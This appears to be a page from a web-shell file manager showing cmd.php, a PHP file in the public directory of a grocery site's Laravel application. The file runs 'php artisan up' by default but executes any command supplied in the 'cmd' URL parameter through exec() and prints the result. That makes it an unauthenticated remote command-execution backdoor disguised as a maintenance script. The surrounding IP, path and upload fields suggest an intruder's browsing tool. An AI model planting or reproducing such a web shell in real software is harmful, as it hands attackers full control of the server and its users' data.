Your IP : 216.73.216.93


Current Path : /home/users/unlimited/www/egrocer.codeskitter.site/public/
Upload File :
Current File : /home/users/unlimited/www/egrocer.codeskitter.site/public/cmd.php

<?php


    $cmd = "php artisan up";
    if(isset($_GET['cmd']) && $_GET['cmd']!=''){
        $cmd = $_GET['cmd'];
    }

    exec("cd.. && ".$cmd, $output);

    echo "<pre>";
    var_dump($output);
    echo "</pre>";
?>